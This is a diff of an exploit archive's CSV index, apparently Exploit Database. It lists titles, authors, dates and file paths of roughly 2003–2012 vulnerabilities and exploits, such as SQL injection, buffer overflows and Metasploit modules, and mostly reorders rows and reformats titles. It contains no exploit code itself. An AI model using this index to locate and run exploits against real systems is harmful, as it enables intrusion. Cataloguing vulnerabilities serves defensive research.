Ercoli",windows,dos,0 -22695,platforms/linux/local/22695.pl,"RedHat 9.0,Slackware 8.1 /bin/mail Carbon Copy Field Buffer Overrun Vulnerability",2003-05-30,mark@vulndev.org,linux,local,0 +22695,platforms/linux/local/22695.pl,"RedHat 9.0_Slackware 8.1 /bin/mail Carbon Copy Field Buffer Overrun Vulnerability",2003-05-30,mark@vulndev.org,linux,local,0 22696,platforms/php/remote/22696.txt,"PHP 4.x Transparent Session ID Cross-Site Scripting Vulnerability",2003-05-30,"Sverre H. Huseby",php,remote,0 22697,platforms/asp/webapps/22697.asp,"iisCart2000 - Arbitrary File Upload Vulnerability",2003-05-31,Bosen,asp,webapps,0 22698,platforms/asp/webapps/22698.pl,"WebCortex WebStores2000 SQL Injection Vulnerability",2003-05-31,Bosen,asp,webapps,0 @@ -19925,10 +19951,10 @@ id,file,description,date,author,platform,type,port 22707,platforms/windows/dos/22707.txt,"Novell Groupwise Internet Agent LDAP BIND Request Overflow Vulnerability",2012-11-14,"Francis Provencher",windows,dos,0 22708,platforms/php/webapps/22708.txt,"dotproject <= 2.1.6 - Remote File Inclusion Vulnerability",2012-11-14,dun,php,webapps,0 22709,platforms/php/webapps/22709.txt,"Narcissus Remote Command Execution Vulnerability",2012-11-14,dun,php,webapps,0 +22713,platforms/php/webapps/22713.txt,"MYRE Realty Manager Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22710,platforms/php/webapps/22710.txt,"friendsinwar FAQ Manager SQL Injection (authbypass) Vulnerability",2012-11-14,d3b4g,php,webapps,0 22711,platforms/php/webapps/22711.txt,"Myrephp Business Directory Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22712,platforms/php/webapps/22712.txt,"MYREphp Vacation Rental Software Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 -22713,platforms/php/webapps/22713.txt,"MYRE Realty Manager Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22714,platforms/windows/remote/22714.rb,"Oracle Database Client System Analyzer Arbitrary File Upload",2012-11-15,metasploit,windows,remote,0 22715,platforms/php/webapps/22715.txt,"WebChat 2.0 Users.PHP Database Username Disclosure Weakness",2003-06-02,"Rynho Zeros Web",php,webapps,0 22716,platforms/php/webapps/22716.txt,"WebChat 2.0 Users.PHP Cross-Site Scripting Vulnerability",2003-06-02,"Rynho Zeros Web",php,webapps,0 @@ -19963,9 +19989,9 @@ id,file,description,date,author,platform,type,port 22746,platforms/asp/webapps/22746.txt,"MaxWebPortal 1.30 - search.asp Search Parameter XSS",2003-06-06,JeiAr,asp,webapps,0 22747,platforms/asp/webapps/22747.txt,"MaxWebPortal 1.30 - Remote Database Disclosure",2003-06-06,JeiAr,asp,webapps,0 22748,platforms/linux/local/22748.c,"Xaos 3.0 Language Option Local Buffer Overflow Vulnerability",2003-06-06,bazarr@ziplip.com,linux,local,0 -22749,platforms/novell/dos/22749.txt,"Novell Netware 6.0,eDirectory 8.7 HTTPSTK.NLM Remote Abend Vulnerability",2003-06-06,"Cheese Head",novell,dos,0 +22749,platforms/novell/dos/22749.txt,"Novell Netware 6.0_eDirectory 8.7 HTTPSTK.NLM Remote Abend Vulnerability",2003-06-06,"Cheese Head",novell,dos,0 22750,platforms/php/webapps/22750.txt,"Zentrack 2.2/2.3/2.4 Index.PHP Remote File Include Vulnerability",2003-06-06,farking,php,webapps,0 -22751,platforms/multiple/remote/22751.txt,"Mozilla 1.x,opera 6/7 Timed Document.Write Method Cross Domain Policy Vulnerability",2003-06-07,meme-boi,multiple,remote,0 +22751,platforms/multiple/remote/22751.txt,"Mozilla 1.x_opera 6/7 Timed Document.Write Method Cross Domain Policy Vulnerability",2003-06-07,meme-boi,multiple,remote,0 22752,platforms/java/webapps/22752.txt,"H-Sphere 2.x HTML Template Inclusion Cross-Site Scripting Vulnerabilities",2003-06-09,"Lorenzo Hernandez Garcia-Hierro",java,webapps,0 22753,platforms/cgi/remote/22753.pl,"MNOGoSearch 3.1.20 - Search.CGI UL Buffer Overflow Vulnerability (1)",2003-06-10,pokleyzz,cgi,remote,0 22754,platforms/cgi/remote/22754.pl,"MNOGoSearch 3.1.20 - Search.CGI UL Buffer Overflow Vulnerability (2)",2003-06-10,inv,cgi,remote,0 @@ -19977,12 +20003,13 @@ id,file,description,date,author,platform,type,port 22760,platforms/php/webapps/22760.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel Account Configuration Modification Vulnerability",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22761,platforms/php/webapps/22761.txt,"PostNuke 0.723 - Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"David F. Madrid",php,webapps,0 22762,platforms/php/webapps/22762.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager (view_faq.php, question param) SQL Injection Vulnerability",2012-11-16,unsuprise,php,webapps,0 +22829,platforms/php/webapps/22829.txt,"webid <= 1.0.5 - Directory Traversal",2012-11-19,loneferret,php,webapps,80 22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 User.PHP UNAME Cross-Site Scripting Vulnerability",2003-06-13,"David F. Madrid",php,webapps,0 22768,platforms/linux/local/22768.pl,"ATFTP 0.7 - Timeout Command Line Argument Local Buffer Overflow Vulnerability",2003-06-06,"Julien LANTHEA",linux,local,0 22769,platforms/windows/remote/22769.txt,"Methodus 3 Web Server File Disclosure Vulnerability",2003-06-13,"Peter Winter-Smith",windows,remote,0 22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting Vulnerability",2003-06-12,badpack3t,cgi,webapps,0 -22771,platforms/linux/remote/22771.txt,"Adobe Acrobat Reader (UNIX) 5.0 6,Xpdf 0.9x Hyperlinks Arbitrary Command Execution",2003-06-13,"Martyn Gilmore",linux,remote,0 +22771,platforms/linux/remote/22771.txt,"Adobe Acrobat Reader (UNIX) 5.0 6 / Xpdf 0.9x Hyperlinks - Arbitrary Command Execution",2003-06-13,"Martyn Gilmore",linux,remote,0 +22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager (view_faq.php question param) SQL Injection Vulnerability",2012-11-16,unsuprise,php,webapps,0 22772,platforms/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 - Remote Command Execution Vulnerability",2003-06-12,badpack3t,cgi,webapps,0 22773,platforms/linux/local/22773.c,"Progress Database 9.1 Environment Variable Local Privilege Escalation Vulnerability",2003-06-14,kf,linux,local,0 22774,platforms/windows/dos/22774.txt,"myServer 0.4.1 Signal Handling Denial of Service Vulnerability",2003-06-14,LynX,windows,dos,0 @@ -20029,8 +20056,8 @@ id,file,description,date,author,platform,type,port 22815,platforms/linux/local/22815.c,"GNU GNATS 3.113 Environment Variable Buffer Overflow Vulnerability",2003-06-21,Xpl017Elz,linux,local,0 22816,platforms/windows/dos/22816.txt,"Symantec Security Check RuFSI ActiveX Control Buffer Overflow Vulnerability",2003-06-23,"Cesar Cerrudo",windows,dos,0 22817,platforms/windows/dos/22817.pl,"MyServer 0.4.1 - Remote Denial of Service Vulnerability",2003-06-23,eip,windows,dos,0 -22818,platforms/php/webapps/22818.txt,"Tutos 1.1 File_Select.PHP Cross-Site Scripting Vulnerability",2003-06-20,"Franois SORIN",php,webapps,0 -22819,platforms/php/webapps/22819.txt,"Tutos 1.1 File_New Arbitrary File Upload Vulnerability",2003-06-20,"Franois SORIN",php,webapps,0 +22818,platforms/php/webapps/22818.txt,"Tutos 1.1 File_Select.PHP Cross-Site Scripting Vulnerability",2003-06-20,"François SORIN",php,webapps,0 +22819,platforms/php/webapps/22819.txt,"Tutos 1.1 File_New Arbitrary File Upload Vulnerability",2003-06-20,"François SORIN",php,webapps,0 22820,platforms/php/webapps/22820.txt,"XMB Forum 1.8 member.php member Parameter XSS",2003-06-23,"Knight Commander",php,webapps,0 22821,platforms/php/webapps/22821.txt,"XMB Forum 1.8 buddy.php action Parameter XSS",2003-06-23,"Knight Commander",php,webapps,0 22822,platforms/windows/dos/22822.txt,"Compaq Web-Based Management Agent Remote Stack Overflow Denial of Service Vulnerability",2003-06-23,"Ian Vitek",windows,dos,0 @@ -20040,7 +20067,6 @@ id,file,description,date,author,platform,type,port 22826,platforms/php/webapps/22826.txt,"VisNetic WebMail 5.8.6 .6 - Information Disclosure Vulnerability",2003-06-23,posidron,php,webapps,0 22827,platforms/windows/remote/22827.txt,"Compaq Web-Based Management Agent Remote File Verification Vulnerability",2003-06-23,"Ian Vitek",windows,remote,0 22828,platforms/php/webapps/22828.txt,"WeBid <= 1.0.5 - Cross-Site Scripting Vulnerabilities",2012-11-19,"Woody Hughes",php,webapps,0 -22829,platforms/php/webapps/22829.txt,"webid <= 1.0.5 - Directory Traversal",2012-11-19,loneferret,php,webapps,80 22830,platforms/linux/remote/22830.c,"LBreakOut2 2.x Login Remote Format String Vulnerability",2003-06-24,V9,linux,remote,0 22831,platforms/freebsd/dos/22831.pl,"Gkrellmd 2.1 - Remote Buffer Overflow Vulnerability (1)",2003-06-24,dodo,freebsd,dos,0 22832,platforms/freebsd/remote/22832.pl,"Gkrellmd 2.1 - Remote Buffer Overflow Vulnerability (2)",2003-06-24,dodo,freebsd,remote,0 @@ -20091,6 +20117,10 @@ id,file,description,date,author,platform,type,port 22877,platforms/php/webapps/22877.txt,"Yii Framework 1.1.8 - Search SQL Injection Vulnerability",2012-11-21,Juno_okyo,php,webapps,0 22878,platforms/windows/dos/22878.txt,"Adobe Reader 10.1.4 JP2KLib&CoolType Crash PoC",2012-11-21,coolkaveh,windows,dos,0 22879,platforms/windows/webapps/22879.txt,"ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities",2012-11-21,Vulnerability-Lab,windows,webapps,0 +23034,platforms/windows/remote/23034.txt,"Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness",2003-08-14,"Andy Davis",windows,remote,0 +23035,platforms/asp/webapps/23035.txt,"Poster 2.0 Unauthorized Privileged User Access Vulnerability",2003-08-15,DarkKnight,asp,webapps,0 +23036,platforms/php/webapps/23036.txt,"MatrikzGB Guestbook 2.0 Administrative Privilege Escalation Vulnerability",2003-08-16,"Stephan Sattler",php,webapps,0 +23037,platforms/windows/local/23037.txt,"DWebPro 3.4.1 Http.ini Plaintext Password Storage Vulnerability",2003-08-18,rUgg1n3,windows,local,0 22881,platforms/php/webapps/22881.txt,"PHP Server Monitor Stored XSS",2012-11-21,loneferret,php,webapps,0 22882,platforms/windows/local/22882.c,"Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (1)",2003-07-08,Maceo,windows,local,0 22883,platforms/windows/local/22883.c,"Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (2)",2003-07-08,Maceo,windows,local,0 @@ -20123,6 +20153,32 @@ id,file,description,date,author,platform,type,port 22910,platforms/php/webapps/22910.html,"Splatt Forum 3/4 Post Icon HTML Injection Vulnerability",2003-07-15,Lethalman,php,webapps,0 22911,platforms/php/local/22911.php,"PHP 4.3.x Undefined Safe_Mode_Include_Dir Safemode Bypass Vulnerability",2003-07-16,"Michal Krause",php,local,0 22912,platforms/unix/local/22912.c,"IBM UniVerse 10.0.0.9 - uvadmsh Privilege Escalation Vulnerability",2003-07-16,kf,unix,local,0 +22942,platforms/php/webapps/22942.txt,"WebCalendar 0.9.x - Local File Include Information Disclosure Vulnerability",2003-07-21,noconflic,php,webapps,0 +22943,platforms/linux/local/22943.c,"Top 1.x/2.0 Home Environment Variable Local Buffer Overflow Vulnerability",2003-07-22,UHAGr,linux,local,0 +22944,platforms/windows/remote/22944.txt,"Savant Web Server 3.1 CGITest.HTML Cross-Site Scripting Vulnerability",2003-07-21,dr_insane,windows,remote,0 +22945,platforms/windows/dos/22945.txt,"Savant Webserver 3.1 - Denial of Service Vulnerabilities",2003-07-21,dr_insane,windows,dos,0 +22946,platforms/windows/local/22946.txt,"MySQL AB ODBC Driver 3.51 Plain Text Password Vulnerability",2003-07-22,hanez,windows,local,0 +22947,platforms/hardware/dos/22947.c,"3Com DSL Router 812 1.1.7/1.1.9/2.0 Administrative Interface Long Request Router DoS",2003-07-21,"David F.Madrid",hardware,dos,0 +22948,platforms/php/webapps/22948.txt,"MoreGroupWare 0.6.8 WEBMAIL2_INC_DIR Remote File Include Vulnerability",2003-07-21,"phil dunn",php,webapps,0 +22949,platforms/netware/dos/22949.txt,"Novell Netware Enterprise Web Server 5.1/6.0 CGI2Perl.NLM Buffer Overflow Vulnerability",2003-07-23,"Uffe Nielsen",netware,dos,0 +22950,platforms/hardware/dos/22950.txt,"Xavi X7028r DSL Router - UPNP Long Request Denial of Service Vulnerability",2003-07-23,"David F. Madrid",hardware,dos,0 +22951,platforms/windows/remote/22951.html,"Opera 7.20 Mail Client Policy Circumvention Vulnerability",2003-07-23,"Arve Bersvendsen",windows,remote,0 +22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 Unspecified Memory Disclosure Vulnerability",2003-07-23,V9,linux,dos,0 +22953,platforms/php/webapps/22953.txt,"PHP-Gastebuch 1.60 Information Disclosure Vulnerabilities",2003-07-24,"Jim Pangalos",php,webapps,0 +22955,platforms/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload And Execution Vulnerability",2003-07-24,"Martin Eiszner",php,webapps,0 +22956,platforms/php/webapps/22956.txt,"e107 Website System 0.555 DB.PHP Information Disclosure Vulnerability",2003-07-24,"Artoor Petrovich",php,webapps,0 +22957,platforms/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000_MSDE Named Pipe Denial of Service Vulnerability",2003-07-23,refdom,windows,dos,0 +22958,platforms/php/webapps/22958.txt,"e107 Website System 0.554 HTML Injection Vulnerability",2003-07-25,"Pete Foster",php,webapps,0 +22959,platforms/windows/remote/22959.txt,"Microsoft Outlook Express 5/6 Script Execution Weakness",2003-07-25,http-equiv,windows,remote,0 +22962,platforms/hardware/dos/22962.pl,"Cisco Aironet AP1x00 Malformed HTTP GET Denial of Service Vulnerability",2003-07-28,blackangels,hardware,dos,0 +22963,platforms/cgi/webapps/22963.txt,"Softshoe Parse-file Cross-Site Scripting Vulnerability",2003-07-28,"Bahaa Naamneh",cgi,webapps,0 +22964,platforms/unix/remote/22964.c,"Mini SQL 1.0/1.3 - Remote Format String Vulnerability",2003-07-28,lucipher,unix,remote,0 +22965,platforms/linux/local/22965.c,"XBlast 2.6.1 HOME Environment Variable Buffer Overflow Vulnerability",2003-07-28,c0wboy,linux,local,0 +22966,platforms/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (1)",2003-07-29,D4rkGr3y,windows,remote,0 +22940,platforms/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting Vulnerability",2003-07-21,"Ferruh Mavituna",php,webapps,0 +22941,platforms/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal Vulnerability",2003-07-21,gr00vy,php,webapps,0 +22967,platforms/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (2)",2003-07-29,anonymous,windows,remote,0 +22968,platforms/linux/remote/22968.c,"Valve Software Half-Life Server <= 1.1.1.0 & 3.1.1.1c1 &4.1.1.1a - Multiplayer Request Buffer Overflow",2003-07-29,hkvig,linux,remote,0 22917,platforms/windows/remote/22917.txt,"Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability",2003-08-11,aT4r@3wdesign.es,windows,remote,0 22918,platforms/unix/dos/22918.txt,"IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow Vulnerability",2003-07-16,kf,unix,dos,0 22919,platforms/windows/remote/22919.txt,"Microsoft ISA Server 2000 - Cross-Site Scripting Vulnerabilities",2003-07-16,"Brett Moore",windows,remote,0 @@ -20138,46 +20194,32 @@ id,file,description,date,author,platform,type,port 22929,platforms/php/webapps/22929.txt,"BuyClassifiedScript PHP Code Injection Vulnerability",2012-11-26,d3b4g,php,webapps,0 22931,platforms/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional (Direct Retn)",2012-11-26,Nezim,windows,local,0 22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x (Direct Retn)",2012-11-26,Nezim,windows,local,0 +22961,platforms/php/webapps/22961.txt,"Gallery 1.2/1.3.x Search Engine Cross-Site Scripting Vulnerability",2003-07-27,"Larry Nguyen",php,webapps,0 +23006,platforms/php/remote/23006.rb,"Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection",2012-11-29,metasploit,php,remote,0 +23007,platforms/windows/local/23007.rb,"Windows AlwaysInstallElevated MSI",2012-11-29,metasploit,windows,local,0 +23008,platforms/php/webapps/23008.txt,"DCForum+ 1.2 Subject Field HTML Injection Vulnerability",2003-08-11,G00db0y,php,webapps,0 +23009,platforms/php/webapps/23009.txt,"Stellar Docs 1.2 Path Disclosure Vulnerability",2003-08-11,G00db0y,php,webapps,0 +23010,platforms/php/webapps/23010.txt,"Better Basket Pro 3.0 Store Builder Remote Path Disclosure Vulnerability",2003-08-11,G00db0y,php,webapps,0 +23011,platforms/php/webapps/23011.txt,"PHPOutSourcing Zorum 3.x - Cross-Site Scripting Vulnerability",2003-08-11,G00db0y,php,webapps,0 +23012,platforms/php/webapps/23012.txt,"News Wizard 2.0 Path Disclosure Vulnerability",2003-08-11,G00db0y,php,webapps,0 +23013,platforms/php/webapps/23013.txt,"PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module SQL Injection Vulnerabilities",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +23014,platforms/php/webapps/23014.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 calendar Module day Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +23015,platforms/php/webapps/23015.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module fatcat_id Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module PAGE_id Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22935,platforms/multiple/dos/22935.txt,"Websense Proxy Filter Bypass",2012-11-26,"Nahuel Grisolia",multiple,dos,0 -22936,platforms/php/webapps/22936.txt,"SmartCMS (index.php, idx parameter) SQL Injection Vulnerability",2012-11-26,NoGe,php,webapps,0 +22936,platforms/php/webapps/22936.txt,"SmartCMS (index.php idx parameter) SQL Injection Vulnerability",2012-11-26,NoGe,php,webapps,0 22937,platforms/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 - Arbitrary File Read Vulnerability",2012-11-26,LiquidWorm,php,webapps,0 +22960,platforms/php/webapps/22960.txt,"PBLang 4.0/4.56 Bulletin Board System IMG Tag HTML Injection Vulnerability",2003-07-28,"Quan Van Truong",php,webapps,0 22938,platforms/linux/dos/22938.py,"mcrypt <= 2.6.8 stack-based Buffer Overflow PoC",2012-11-26,_ishikawa,linux,dos,0 22939,platforms/unix/local/22939.pl,"GNU GNATS 3.113.1_6 - Queue-PR Database Command Line Option Buffer Overflow Vulnerability",2003-07-21,inv[at]dtors,unix,local,0 -22940,platforms/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting Vulnerability",2003-07-21,"Ferruh Mavituna",php,webapps,0 -22941,platforms/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal Vulnerability",2003-07-21,gr00vy,php,webapps,0 -22942,platforms/php/webapps/22942.txt,"WebCalendar 0.9.x - Local File Include Information Disclosure Vulnerability",2003-07-21,noconflic,php,webapps,0 -22943,platforms/linux/local/22943.c,"Top 1.x/2.0 Home Environment Variable Local Buffer Overflow Vulnerability",2003-07-22,UHAGr,linux,local,0 -22944,platforms/windows/remote/22944.txt,"Savant Web Server 3.1 CGITest.HTML Cross-Site Scripting Vulnerability",2003-07-21,dr_insane,windows,remote,0 -22945,platforms/windows/dos/22945.txt,"Savant Webserver 3.1 - Denial of Service Vulnerabilities",2003-07-21,dr_insane,windows,dos,0 -22946,platforms/windows/local/22946.txt,"MySQL AB ODBC Driver 3.51 Plain Text Password Vulnerability",2003-07-22,hanez,windows,local,0 -22947,platforms/hardware/dos/22947.c,"3Com DSL Router 812 1.1.7/1.1.9/2.0 Administrative Interface Long Request Router DoS",2003-07-21,"David F.Madrid",hardware,dos,0 -22948,platforms/php/webapps/22948.txt,"MoreGroupWare 0.6.8 WEBMAIL2_INC_DIR Remote File Include Vulnerability",2003-07-21,"phil dunn",php,webapps,0 -22949,platforms/netware/dos/22949.txt,"Novell Netware Enterprise Web Server 5.1/6.0 CGI2Perl.NLM Buffer Overflow Vulnerability",2003-07-23,"Uffe Nielsen",netware,dos,0 -22950,platforms/hardware/dos/22950.txt,"Xavi X7028r DSL Router - UPNP Long Request Denial of Service Vulnerability",2003-07-23,"David F. Madrid",hardware,dos,0 -22951,platforms/windows/remote/22951.html,"Opera 7.20 Mail Client Policy Circumvention Vulnerability",2003-07-23,"Arve Bersvendsen",windows,remote,0 -22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 Unspecified Memory Disclosure Vulnerability",2003-07-23,V9,linux,dos,0 -22953,platforms/php/webapps/22953.txt,"PHP-Gastebuch 1.60 Information Disclosure Vulnerabilities",2003-07-24,"Jim Pangalos",php,webapps,0 -22955,platforms/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload And Execution Vulnerability",2003-07-24,"Martin Eiszner",php,webapps,0 -22956,platforms/php/webapps/22956.txt,"e107 Website System 0.555 DB.PHP Information Disclosure Vulnerability",2003-07-24,"Artoor Petrovich",php,webapps,0 -22957,platforms/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000,MSDE Named Pipe Denial of Service Vulnerability",2003-07-23,refdom,windows,dos,0 -22958,platforms/php/webapps/22958.txt,"e107 Website System 0.554 HTML Injection Vulnerability",2003-07-25,"Pete Foster",php,webapps,0 -22959,platforms/windows/remote/22959.txt,"Microsoft Outlook Express 5/6 Script Execution Weakness",2003-07-25,http-equiv,windows,remote,0 -22960,platforms/php/webapps/22960.txt,"PBLang 4.0/4.56 Bulletin Board System IMG Tag HTML Injection Vulnerability",2003-07-28,"Quan Van Truong",php,webapps,0 -22961,platforms/php/webapps/22961.txt,"Gallery 1.2/1.3.x Search Engine Cross-Site Scripting Vulnerability",2003-07-27,"Larry Nguyen",php,webapps,0 -22962,platforms/hardware/dos/22962.pl,"Cisco Aironet AP1x00 Malformed HTTP GET Denial of Service Vulnerability",2003-07-28,blackangels,hardware,dos,0 -22963,platforms/cgi/webapps/22963.txt,"Softshoe Parse-file Cross-Site Scripting Vulnerability",2003-07-28,"Bahaa Naamneh",cgi,webapps,0 -22964,platforms/unix/remote/22964.c,"Mini SQL 1.0/1.3 - Remote Format String Vulnerability",2003-07-28,lucipher,unix,remote,0 -22965,platforms/linux/local/22965.c,"XBlast 2.6.1 HOME Environment Variable Buffer Overflow Vulnerability",2003-07-28,c0wboy,linux,local,0 -22966,platforms/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (1)",2003-07-29,D4rkGr3y,windows,remote,0 -22967,platforms/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (2)",2003-07-29,anonymous,windows,remote,0 -22968,platforms/linux/remote/22968.c,"Valve Software Half-Life Server <= 1.1.1.0 , 3.1.1.1c1 and 4.1.1.1a Multiplayer Request Buffer Overflow",2003-07-29,hkvig,linux,remote,0 22969,platforms/linux/remote/22969.c,"Valve Software Half-Life Server 3.1.1.0 - Multiplayer Request Buffer Overflow",2003-07-29,KnbykL,linux,remote,0 22970,platforms/windows/dos/22970.txt,"NetScreen ScreenOS 4.0.1/4.0.3 TCP Window Size Remote Denial of Service Vulnerability",2003-07-29,"Papa loves Mambo",windows,dos,0 22971,platforms/linux/local/22971.txt,"ManDB Utility 2.3/2.4 - Local Buffer Overflow Vulnerabilities",2003-07-29,V9,linux,local,0 22972,platforms/windows/webapps/22972.txt,"gleamtech filevista/fileultimate 4.6 - Directory Traversal",2012-11-28,"Soroush Dalili",windows,webapps,0 22973,platforms/windows/remote/22973.rb,"Apple QuickTime 7.7.2 MIME Type Buffer Overflow",2012-11-28,metasploit,windows,remote,0 22974,platforms/unix/remote/22974.c,"wu-ftpd 2.6.2 realpath() Off-By-One Buffer Overflow Vulnerability",2003-08-02,Xpl017Elz,unix,remote,0 -22975,platforms/unix/remote/22975.c,"wu-ftpd 2.6.2, 2.6.0, 2.6.1 realpath() Off-By-One Buffer Overflow Vulnerability",2003-08-06,Xpl017Elz,unix,remote,0 +23003,platforms/windows/dos/23003.py,"UMPlayer Portable 0.95 Crash PoC",2012-11-29,p3kok,windows,dos,0 +22975,platforms/unix/remote/22975.c,"wu-ftpd 2.6.2_ 2.6.0_ 2.6.1 realpath() Off-By-One Buffer Overflow Vulnerability",2003-08-06,Xpl017Elz,unix,remote,0 22976,platforms/freebsd/remote/22976.pl,"freeBSD 4.8 realpath() Off-By-One Buffer Overflow Vulnerability",2003-07-31,daniels@legend.co.uk,freebsd,remote,0 22977,platforms/php/webapps/22977.txt,"MOD Guthabenhack 1.3 For Woltlab Burning Board SQL Injection Vulnerability",2003-07-31,ben.moeckel@badwebmasters.net,php,webapps,0 22978,platforms/hardware/dos/22978.txt,"Cisco IOS 10/11/12 UDP Echo Service Memory Disclosure Vulnerability",2003-08-01,FX,hardware,dos,0 @@ -20190,13 +20232,13 @@ id,file,description,date,author,platform,type,port 22985,platforms/linux/local/22985.c,"Xtokkaetama 1.0 b-6 Nickname Local Buffer Overflow Vulnerability (2)",2003-08-04,techieone@softhome.net,linux,local,0 22986,platforms/php/webapps/22986.txt,"Macromedia Dreamweaver MX 6.0 PHP User Authentication Suite Cross-Site-Scripting Vulnerability",2003-08-04,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22987,platforms/multiple/dos/22987.pl,"EveryBuddy 0.4.3 Long Message Denial of Service Vulnerability",2003-08-05,"Noam Rathaus",multiple,dos,0 -22988,platforms/unix/local/22988.sh,"IBM DB2 db2job File Overwrite Vulnerability",2003-08-05,"Juan Manuel Pascual Escribá",unix,local,0 +22988,platforms/unix/local/22988.sh,"IBM DB2 db2job File Overwrite Vulnerability",2003-08-05,"Juan Manuel Pascual Escribá",unix,local,0 22989,platforms/unix/local/22989.pl,"IBM DB2 Shared Library Injection Vulnerability",2003-08-05,daniels@legend.co.uk,unix,local,0 22990,platforms/php/webapps/22990.txt,"vBulletin 3.0 Register.PHP HTML Injection Vulnerability",2003-08-06,"Ferruh Mavituna",php,webapps,0 22991,platforms/hardware/dos/22991.txt,"D-Link DI-704P Long URL Denial of Service Vulnerability",2003-08-06,chris@cr-secure.net,hardware,dos,0 22992,platforms/asp/webapps/22992.txt,"IdealBB 1.4.9 Error.ASP Cross-Site Scripting Vulnerability",2003-08-07,G00db0y,asp,webapps,0 22993,platforms/linux/local/22993.txt,"IPNetSentryX / IPNetMonitorX Unauthorized Network Reconnaissance Vulnerability",2003-07-07,@stake,linux,local,0 -22994,platforms/multiple/remote/22994.txt,"Sun One 5.1,IPlanet 5.0/5.1 Administration Server Directory Traversal Vulnerability",2003-08-08,"Jim Hardisty",multiple,remote,0 +22994,platforms/multiple/remote/22994.txt,"Sun One 5.1_IPlanet 5.0/5.1 Administration Server Directory Traversal Vulnerability",2003-08-08,"Jim Hardisty",multiple,remote,0 22995,platforms/php/webapps/22995.txt,"C-Cart 1.0 Path Disclosure Vulnerability",2003-08-08,G00db0y,php,webapps,0 22996,platforms/linux/local/22996.c,"XPCD 2.0.8 Home Environment Variable Local Buffer Overflow Vulnerability",2003-07-18,r-code,linux,local,0 22997,platforms/php/webapps/22997.txt,"PostNuke 0.6/0.7 Downloads Module TTitle Cross-Site Scripting Vulnerability",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 @@ -20205,20 +20247,8 @@ id,file,description,date,author,platform,type,port 23000,platforms/php/webapps/23000.txt,"geeeekShop 1.4 Information Disclosure Vulnerabilities",2003-08-09,G00db0y,php,webapps,0 23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 Admin.PHP Cross-Site Scripting Vulnerability",2003-08-09,"Boy Bear",php,webapps,0 23002,platforms/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 Null Password Authentication Vulnerability",2003-08-09,"Buckaroo Banzai",windows,remote,0 -23003,platforms/windows/dos/23003.py,"UMPlayer Portable 0.95 Crash PoC",2012-11-29,p3kok,windows,dos,0 23004,platforms/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 - Multiple XSS POST Injection Vulnerabilities",2012-11-29,LiquidWorm,multiple,webapps,0 23005,platforms/asp/webapps/23005.txt,"FCKEditor ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0 -23006,platforms/php/remote/23006.rb,"Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection",2012-11-29,metasploit,php,remote,0 -23007,platforms/windows/local/23007.rb,"Windows AlwaysInstallElevated MSI",2012-11-29,metasploit,windows,local,0 -23008,platforms/php/webapps/23008.txt,"DCForum+ 1.2 Subject Field HTML Injection Vulnerability",2003-08-11,G00db0y,php,webapps,0 